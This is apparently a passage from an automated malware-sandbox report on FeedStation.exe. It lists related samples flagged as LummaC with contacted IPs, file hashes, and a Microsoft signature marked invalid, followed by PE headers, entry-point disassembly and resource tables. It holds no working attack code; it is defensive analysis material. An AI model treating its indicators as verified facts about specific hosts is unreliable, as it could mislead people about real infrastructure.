                                                                                                                                                                                                                          expt64.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          No created / dropped files found
                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                          Entropy (8bit):6.882883769669176
                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 98.10%
                                                                                                                                                                                                                          • Windows ActiveX control (116523/4) 1.14%
                                                                                                                                                                                                                          • InstallShield setup (43055/19) 0.42%
                                                                                                                                                                                                                          • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                                                                                                                                                          • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                                                                                          File name:FeedStation.exe
                                                                                                                                                                                                                          File size:2'000'360 bytes
                                                                                                                                                                                                                          MD5:256a1ccec403335433630f6824e081df
                                                                                                                                                                                                                          SHA1:88abf0221a21e688971e4f746f802d86a86fe085
                                                                                                                                                                                                                          SHA256:f99595da2c8aca38f9749dc0b36d5203e2d51769db297aaa45bcb1eea27cec5d
                                                                                                                                                                                                                          SHA512:56bef26930b9c4d7e3e9388fc9abb916f012dc2a643927eb8047527ce337d39e99d76f5613722e4458959fd130d47e954992f3b106c81007d69e8c48203612e0
                                                                                                                                                                                                                          SSDEEP:49152:Dp1Apo12fC7jEnsoK/7Co4EQxrwH6FxeUa5zJDs40:DnAu12bnsT/2o4EWrwHYxravDs1
                                                                                                                                                                                                                          TLSH:4E958E22F3825877D3631A359C2B52AC55367F245B2864CF7BE43D1C9F396427D2A283
                                                                                                                                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                                                                          Icon Hash:870f0e3f7371311f
                                                                                                                                                                                                                          Entrypoint:0x64541c
                                                                                                                                                                                                                          Entrypoint Section:CODE
                                                                                                                                                                                                                          Digitally signed:true
                                                                                                                                                                                                                          Imagebase:0x500000
                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                                                                          DLL Characteristics:
                                                                                                                                                                                                                          Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                          OS Version Major:4
                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                          File Version Major:4
                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                          Import Hash:89219008842d40ae27b868ac6a3a5515
                                                                                                                                                                                                                          Signature Valid:false
                                                                                                                                                                                                                          Signature Issuer:CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                          Error Number:-2146869232
                                                                                                                                                                                                                          Not Before, Not After
                                                                                                                                                                                                                          • 22/08/2024 21:26:44 20/08/2025 21:26:44
                                                                                                                                                                                                                          Subject Chain
                                                                                                                                                                                                                          • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                                                                          Version:3
                                                                                                                                                                                                                          Thumbprint MD5:FB871CDFBD500B74EE2AFA5A776E78E2
                                                                                                                                                                                                                          Thumbprint SHA-1:04A696B6B949498D3DE9343B11BBFBA471539735
                                                                                                                                                                                                                          Thumbprint SHA-256:0F619AD69C4C3DF0CBD718DB3AC011E0A774E8E7FCD3A549DCF735ABE6E6D71B
                                                                                                                                                                                                                          Serial:33000003FE6BCEDAD6C80303A30000000003FE
                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                                                          mov ecx, 00000012h
                                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                                                          dec ecx
                                                                                                                                                                                                                          jne 00007F67CC83F35Bh
                                                                                                                                                                                                                          push ecx
                                                                                                                                                                                                                          mov eax, 00644DDCh
                                                                                                                                                                                                                          call 00007F67CC701103h
                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                          push ebp
                                                                                                                                                                                                                          push 006455ECh
                                                                                                                                                                                                                          push dword ptr fs:[eax]
                                                                                                                                                                                                                          mov dword ptr fs:[eax], esp
                                                                                                                                                                                                                          mov edx, 00645600h
                                                                                                                                                                                                                          mov eax, 0064561Ch
                                                                                                                                                                                                                          call 00007F67CC82D6F2h
                                                                                                                                                                                                                          test al, al
                                                                                                                                                                                                                          je 00007F67CC83F373h
                                                                                                                                                                                                                          mov eax, dword ptr [0064A274h]
                                                                                                                                                                                                                          mov eax, dword ptr [eax]
                                                                                                                                                                                                                          call 00007F67CC7830FAh
                                                                                                                                                                                                                          jmp 00007F67CC83F4BAh
                                                                                                                                                                                                                          lea edx, dword ptr [ebp-20h]
                                                                                                                                                                                                                          mov eax, 00000001h
                                                                                                                                                                                                                          call 00007F67CC798E28h
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-20h]
                                                                                                                                                                                                                          call 00007F67CC70DFECh
                                                                                                                                                                                                                          mov edx, dword ptr [00649D74h]
                                                                                                                                                                                                                          mov byte ptr [edx], al
                                                                                                                                                                                                                          mov eax, dword ptr [00649D74h]
                                                                                                                                                                                                                          cmp byte ptr [eax], 00000000h
                                                                                                                                                                                                                          je 00007F67CC83F42Dh
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-30h]
                                                                                                                                                                                                                          xor edx, edx
                                                                                                                                                                                                                          call 00007F67CC710578h
                                                                                                                                                                                                                          lea edx, dword ptr [ebp-30h]
                                                                                                                                                                                                                          mov eax, 00000001h
                                                                                                                                                                                                                          call 00007F67CC79908Fh
                                                                                                                                                                                                                          call 00007F67CC799422h
                                                                                                                                                                                                                          lea edx, dword ptr [ebp-40h]
                                                                                                                                                                                                                          mov eax, 00000003h
                                                                                                                                                                                                                          call 00007F67CC798DE1h
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-40h]
                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-50h]
                                                                                                                                                                                                                          mov edx, 00000008h
                                                                                                                                                                                                                          mov cl, 01h
                                                                                                                                                                                                                          call 00007F67CC710356h
                                                                                                                                                                                                                          lea edx, dword ptr [ebp-50h]
                                                                                                                                                                                                                          pop eax
                                                                                                                                                                                                                          call 00007F67CC712A19h
                                                                                                                                                                                                                          jle 00007F67CC83F37Eh
                                                                                                                                                                                                                          lea eax, dword ptr [ebp-60h]
                                                                                                                                                                                                                          mov edx, 00000008h
                                                                                                                                                                                                                          mov cl, 01h
                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1500000x2fa4.idata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x16b0000x99200.rsrc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x1e56000x2fe8.rsrc
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x1540000x18.rdata
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                          CODE0x10000x1446900x14480000bd1870599878d9532ebb02c86c463fFalse0.5039920189714946data6.564023980749749IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          DATA0x1460000x45300x46006bd23cfd42470a69764b870fd2e71eddFalse0.42862723214285714data4.3120000686896995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          BSS0x14b0000x40950x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .idata0x1500000x2fa40x300026c2cbd9f6a8f4fe1bdadcd703f4f9b7False0.36572265625data5.0425606985241185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .tls0x1530000x100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                          .rdata0x1540000x180x20063ab5e836d7ca42436d0e1050971c21eFalse0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "e"0.2069200177871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .reloc0x1550000x1521c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          .rsrc0x16b0000x992000x9920059cfb43128e49ac411f6ac9275130585False0.4791374362244898data7.052090906631428IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                          RT_CURSOR0x16dc680x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.38636363636363635
                                                                                                                                                                                                                          RT_CURSOR0x16dd9c0x134data0.4642857142857143
                                                                                                                                                                                                                          RT_CURSOR0x16ded00x134data0.4805194805194805
                                                                                                                                                                                                                          RT_CURSOR0x16e0040x134data0.38311688311688313
                                                                                                                                                                                                                          RT_CURSOR0x16e1380x134data0.36038961038961037
                                                                                                                                                                                                                          RT_CURSOR0x16e26c0x134data0.4090909090909091
                                                                                                                                                                                                                          RT_CURSOR0x16e3a00x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"0.4967532467532468
                                                                                                                                                                                                                          RT_CURSOR0x16e4d40x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"RussianRussia0.35714285714285715
                                                                                                                                                                                                                          RT_CURSOR0x16e6080x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"RussianRussia0.35064935064935066
                                                                                                                                                                                                                          RT_CURSOR0x16e73c0x134dataRussianRussia0.6038961038961039
                                                                                                                                                                                                                          RT_CURSOR0x16e8700x134AmigaOS bitmap font "(", fc_YSize 4294935297, 3840 elements, 2nd "\200\003\377\201\300\007\377\203\300\017\377\003\340\037\376\007\360\037\370\017\370\003\300\037\374", 3rdRussianRussia0.711038961038961
                                                                                                                                                                                                                          RT_CURSOR0x16e9a40x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4837662337662338
                                                                                                                                                                                                                          RT_CURSOR0x16ead80x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.32142857142857145
                                                                                                                                                                                                                          RT_CURSOR0x16ec0c0x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.40584415584415584
                                                                                                                                                                                                                          RT_CURSOR0x16ed400x134dataRussianRussia0.44155844155844154
                                                                                                                                                                                                                          RT_CURSOR0x16ee740x134Targa image data 64 x 65536 x 1 +32 "\001"RussianRussia0.5746753246753247
                                                                                                                                                                                                                          RT_CURSOR0x16efa80x134AmigaOS bitmap font "(", fc_YSize 4294966287, 3840 elements, 2nd "\376\017\340\377\377\017\341\377\377\217\343\377\377\337\367\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdRussianRussia0.4642857142857143
                                                                                                                                                                                                                          RT_CURSOR0x16f0dc0x134dataRussianRussia0.3409090909090909
                                                                                                                                                                                                                          RT_CURSOR0x16f2100x134Targa image data 64 x 65536 x 1 +32 "\001"RussianRussia0.36038961038961037
                                                                                                                                                                                                                          RT_CURSOR0x16f3440x134Targa image data 64 x 65536 x 1 +32 "\001"RussianRussia0.3474025974025974
                                                                                                                                                                                                                          RT_CURSOR0x16f4780x134AmigaOS bitmap font "(", fc_YSize 4294967040, 3840 elements, 2nd "\376", 3rdRussianRussia0.4383116883116883
                                                                                                                                                                                                                          RT_CURSOR0x16f5ac0x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"RussianRussia0.4512987012987013
                                                                                                                                                                                                                          RT_CURSOR0x16f6e00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"RussianRussia0.39285714285714285
                                                                                                                                                                                                                          RT_CURSOR0x16f8140x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"RussianRussia0.4967532467532468
                                                                                                                                                                                                                          RT_CURSOR0x16f9480x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"RussianRussia0.32142857142857145
                                                                                                                                                                                                                          RT_BITMAP0x16fa7c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                                                                                                          RT_BITMAP0x16fc4c0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 3800.46487603305785125
                                                                                                                                                                                                                          RT_BITMAP0x16fe300x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.43103448275862066
                                                                                                                                                                                                                          RT_BITMAP0x1700000x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39870689655172414
                                                                                                                                                                                                                          RT_BITMAP0x1701d00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.4245689655172414
                                                                                                                                                                                                                          RT_BITMAP0x1703a00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5021551724137931
                                                                                                                                                                                                                          RT_BITMAP0x1705700x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5064655172413793
                                                                                                                                                                                                                          RT_BITMAP0x1707400x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                                                                                                          RT_BITMAP0x1709100x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.5344827586206896
                                                                                                                                                                                                                          RT_BITMAP0x170ae00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 3600.39655172413793105
                                                                                                                                                                                                                          RT_BITMAP0x170cb00xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.5208333333333334
                                                                                                                                                                                                                          RT_BITMAP0x170d700xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.42857142857142855
                                                                                                                                                                                                                          RT_BITMAP0x170e500xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.4955357142857143
                                                                                                                                                                                                                          RT_BITMAP0x170f300x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.5285714285714286
                                                                                                                                                                                                                          RT_BITMAP0x170fbc0xc8Device independent bitmap graphic, 12 x 12 x 4, image size 96RussianRussia0.41
                                                                                                                                                                                                                          RT_BITMAP0x1710840xc8Device independent bitmap graphic, 12 x 12 x 4, image size 96RussianRussia0.39
                                                                                                                                                                                                                          RT_BITMAP0x17114c0x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.45
                                                                                                                                                                                                                          RT_BITMAP0x1711d80x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.25
                                                                                                                                                                                                                          RT_BITMAP0x1714100x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.20950704225352113
                                                                                                                                                                                                                          RT_BITMAP0x1716480x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.5071428571428571
                                                                                                                                                                                                                          RT_BITMAP0x1716d40x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.5142857142857142
                                                                                                                                                                                                                          RT_BITMAP0x1717600x8cDevice independent bitmap graphic, 5 x 9 x 4, image size 360.4857142857142857
                                                                                                                                                                                                                          RT_BITMAP0x1717ec0x238Device independent bitmap graphic, 29 x 29 x 4, image size 4640.21654929577464788
                                                                                                                                                                                                                          RT_BITMAP0x171a240xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.3232758620689655
                                                                                                                                                                                                                          RT_BITMAP0x171b0c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.28448275862068967
                                                                                                                                                                                                                          RT_BITMAP0x171bf40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.2629310344827586
                                                                                                                                                                                                                          RT_BITMAP0x171cdc0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.33189655172413796
                                                                                                                                                                                                                          RT_BITMAP0x171dc40x4acDevice independent bitmap graphic, 11 x 11 x 8, image size 1320.4498327759197324
                                                                                                                                                                                                                          RT_BITMAP0x1722700x4acDevice independent bitmap graphic, 11 x 11 x 8, image size 1320.459866220735786
                                                                                                                                                                                                                          RT_BITMAP0x17271c0xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                                                                                                                                                                                          RT_BITMAP0x1727e40xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.44
                                                                                                                                                                                                                          RT_BITMAP0x1728ac0xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                                                                                                                                                                                          RT_BITMAP0x1729740xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                                                                                                                                                                                          RT_BITMAP0x172a3c0xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                                                                                                                                                                                          RT_BITMAP0x172b040xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.435
                                                                                                                                                                                                                          RT_BITMAP0x172bcc0xc8Device independent bitmap graphic, 17 x 8 x 4, image size 960.445
                                                                                                                                                                                                                          RT_BITMAP0x172c940x528Device independent bitmap graphic, 16 x 16 x 8, image size 2560.5280303030303031
                                                                                                                                                                                                                          RT_BITMAP0x1731bc0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.38392857142857145
                                                                                                                                                                                                                          RT_BITMAP0x17329c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.4947916666666667
                                                                                                                                                                                                                          RT_BITMAP0x17335c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.484375
                                                                                                                                                                                                                          RT_BITMAP0x17341c0x17ee0Device independent bitmap graphic, 441 x 74 x 24, image size 97976EnglishUnited States0.2651403852432256
                                                                                                                                                                                                                          RT_BITMAP0x18b2fc0x18f0Device independent bitmap graphic, 140 x 38 x 8, image size 5320, 256 important colorsEnglishUnited States0.20269423558897243
                                                                                                                                                                                                                          RT_BITMAP0x18cbec0x2404Device independent bitmap graphic, 180 x 17 x 24, image size 9180EnglishUnited States0.01984815618221258
                                                                                                                                                                                                                          RT_BITMAP0x18eff00x2404Device independent bitmap graphic, 180 x 17 x 24, image size 9180EnglishUnited States0.06995661605206074
                                                                                                                                                                                                                          RT_BITMAP0x1913f40xa8Device independent bitmap graphic, 6 x 16 x 4, image size 64, 16 important colorsEnglishUnited States0.4880952380952381
                                                                                                                                                                                                                          RT_BITMAP0x19149c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.42410714285714285
                                                                                                                                                                                                                          RT_BITMAP0x19157c0xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.5104166666666666
                                                                                                                                                                                                                          RT_BITMAP0x19163c0xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.5
                                                                                                                                                                                                                          RT_BITMAP0x19171c0xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.4870689655172414
                                                                                                                                                                                                                          RT_BITMAP0x1918040xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors0.4895833333333333
                                                                                                                                                                                                                          RT_BITMAP0x1918c40xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors0.3794642857142857
                                                                                                                                                                                                                          RT_ICON0x1919a40xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2688, 256 important colorsEnglishUnited States0.4925373134328358
                                                                                                                                                                                                                          RT_ICON0x19284c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152, 256 important colorsEnglishUnited States0.4223826714801444
                                                                                                                                                                                                                          RT_ICON0x1930f40x568Device independent bitmap graphic, 16 x 32 x 8, image size 320, 256 important colorsEnglishUnited States0.2651734104046243
                                                                                                                                                                                                                          RT_ICON0x19365c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.18931535269709543
                                                                                                                                                                                                                          RT_ICON0x195c040x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.28681988742964354
                                                                                                                                                                                                                          RT_ICON0x196cac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.4920042643923241
                                                                                                                                                                                                                          RT_ICON0x197b540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.41922382671480146
                                                                                                                                                                                                                          RT_ICON0x1983fc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.26372832369942195
                                                                                                                                                                                                                          RT_ICON0x1989640x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.528179190751445
                                                                                                                                                                                                                          RT_ICON0x198ecc0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5101156069364162
                                                                                                                                                                                                                          RT_ICON0x1994340x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5122832369942196
                                                                                                                                                                                                                          RT_ICON0x19999c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5187861271676301
                                                                                                                                                                                                                          RT_ICON0x199f040x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5202312138728323
                                                                                                                                                                                                                          RT_ICON0x19a46c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3723404255319149
                                                                                                                                                                                                                          RT_DIALOG0x19a8d40x52data0.7682926829268293
                                                                                                                                                                                                                          RT_STRING0x19a9280x25cdata0.48013245033112584
                                                                                                                                                                                                                          RT_STRING0x19ab840x29cdata0.44610778443113774
                                                                                                                                                                                                                          RT_STRING0x19ae200x190data0.4875
                                                                                                                                                                                                                          RT_STRING0x19afb00x18cAmigaOS bitmap font "m", fc_YSize 29184, 18688 elements, 2nd "s", 3rd0.5277777777777778
                                                                                                                                                                                                                          RT_STRING0x19b13c0x2a8data0.43823529411764706
                                                                                                                                                                                                                          RT_STRING0x19b3e40x8a0data0.3179347826086957
                                                                                                                                                                                                                          RT_STRING0x19bc840x378data0.4166666666666667
                                                                                                                                                                                                                          RT_STRING0x19bffc0x134data0.5876623376623377
                                                                                                                                                                                                                          RT_STRING0x19c1300x4dcdata0.27733118971061094
                                                                                                                                                                                                                          RT_STRING0x19c60c0x36cdata0.3812785388127854
                                                                                                                                                                                                                          RT_STRING0x19c9780x1a0data0.5
                                                                                                                                                                                                                          RT_STRING0x19cb180x1c4data0.42035398230088494
                                                                                                                                                                                                                          RT_STRING0x19ccdc0x2c0data0.3196022727272727
                                                                                                                                                                                                                          RT_STRING0x19cf9c0x358data0.4182242990654206
                                                                                                                                                                                                                          RT_STRING0x19d2f40x4a8data0.32466442953020136
                                                                                                                                                                                                                          RT_STRING0x19d79c0x504data0.3333333333333333
                                                                                                                                                                                                                          RT_STRING0x19dca00x500data0.34296875
                                                                                                                                                                                                                          RT_STRING0x19e1a00x1e4data0.38016528925619836
                                                                                                                                                                                                                          RT_STRING0x19e3840x1a4data0.4714285714285714
                                                                                                                                                                                                                          RT_STRING0x19e5280x11cdata0.5880281690140845
                                                                                                                                                                                                                          RT_STRING0x19e6440x3ecStarOffice Gallery theme l, 1677748480 objects, 1st l0.41733067729083667
                                                                                                                                                                                                                          RT_STRING0x19ea300xc0data0.609375
                                                                                                                                                                                                                          RT_STRING0x19eaf00x104data0.573076923076923
                                                                                                                                                                                                                          RT_STRING0x19ebf40x168data0.5277777777777778
                                                                                                                                                                                                                          RT_STRING0x19ed5c0x480data0.3671875
                                                                                                                                                                                                                          RT_STRING0x19f1dc0x390data0.3684210526315789
                                                                                                                                                                                                                          RT_STRING0x19f56c0x388data0.36504424778761063
                                                                                                                                                                                                                          RT_STRING0x19f8f40x34cdata0.3518957345971564
                                                                                                                                                                                                                          RT_STRING0x19fc400x3bcdata0.39435146443514646
                                                                                                                                                                                                                          RT_STRING0x19fffc0xf4data0.47540983606557374
                                                                                                                                                                                                                          RT_STRING0x1a00f00xc4data0.5663265306122449
                                                                                                                                                                                                                          RT_STRING0x1a01b40x2c0data0.4446022727272727
                                                                                                                                                                                                                          RT_STRING0x1a04740x420data0.32007575757575757
                                                                                                                                                                                                                          RT_STRING0x1a08940x330data0.3639705882352941
                                                                                                                                                                                                                          RT_STRING0x1a0bc40x314data0.34390862944162437
                                                                                                                                                                                                                          RT_RCDATA0x1a0ed80x10data1.5
                                                                                                                                                                                                                          RT_RCDATA0x1a0ee80x9b8data0.6157556270096463
                                                                                                                                                                                                                          RT_RCDATA0x1a18a00x2f66Delphi compiled form 'TdxBarCustomizingForm'0.2567166639195649
                                                                                                                                                                                                                          RT_RCDATA0x1a48080x4b0Delphi compiled form 'TdxBarItemAddEditor'0.4608333333333333
                                                                                                                                                                                                                          RT_RCDATA0x1a4cb80x287Delphi compiled form 'TdxBarNameEd'0.6058732612055642
                                                                                                                                                                                                                          RT_RCDATA0x1a4f400x171Delphi compiled form 'TdxBarSubMenuEditor'0.7100271002710027
                                                                                                                                                                                                                          RT_RCDATA0x1a50b40x46dDelphi compiled form 'TfAboutDlg'0.5145631067961165
                                                                                                                                                                                                                          RT_RCDATA0x1a55240x390Delphi compiled form 'TfErrorLogDlg'0.5964912280701754
                                                                                                                                                                                                                          RT_RCDATA0x1a58b40x6179Delphi compiled form 'TfFeedStationMain'0.3395182943934597
                                                                                                                                                                                                                          RT_RCDATA0x1aba300xa26Delphi compiled form 'TfOpenUrlDlg'0.8160123171670516
                                                                                                                                                                                                                          RT_RCDATA0x1ac4580x519cDelphi compiled form 'TfOptionsDlg'0.200124449550067
                                                                                                                                                                                                                          RT_RCDATA0x1b15f40x81aDelphi compiled form 'TfProxyDlg'0.38235294117647056
                                                                                                                                                                                                                          RT_RCDATA0x1b1e100x49cDelphi compiled form 'TfrmAddGroupItems'0.4610169491525424
                                                                                                                                                                                                                          RT_RCDATA0x1b22ac0x2e0Delphi compiled form 'TfSyncProgressDlg'0.6046195652173914
                                                                                                                                                                                                                          RT_RCDATA0x1b258c0x403Delphi compiled form 'TSxExtendedExceptionInfoWindow'0.5131450827653359
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b29900x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b29a40x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b29b80x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b29cc0x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b29e00x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b29f40x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2a080x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2a1c0x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2a300x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2a440x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2a580x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2a6c0x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2a800x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2a940x14data1.4
                                                                                                                                                                                                                          RT_GROUP_CURSOR0x1b2aa80x14data1.4
